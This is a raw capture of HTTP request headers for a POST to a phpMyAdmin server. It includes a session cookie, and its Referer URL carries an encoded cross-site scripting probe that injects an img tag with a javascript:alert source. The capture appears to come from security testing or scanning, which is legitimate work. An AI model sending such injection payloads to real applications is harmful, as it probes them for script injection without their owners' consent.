Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip, deflate
Accept-Language:en-US,en;q=0.8
Cache-Control:max-age=0
Connection:keep-alive
Content-Length:172
Content-Type:application/x-www-form-urlencoded
Cookie:pma_lang=en; pma_collation_connection=utf8_unicode_ci; phpMyAdmin=c48q8v6c7rj60qe2nvhrrmnv3qc0m78o
Host:52.7.209.35
Origin:http//52.7.209.35
Referer:http//52.7.209.35/chk_rel.php?db=%3E%22%27%3E%3Cimg%20src=%22javascript:alert(311050)%22%3E&token=6026d96cfcb8993f744a00809536dc8b&goto=db_operations.php
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36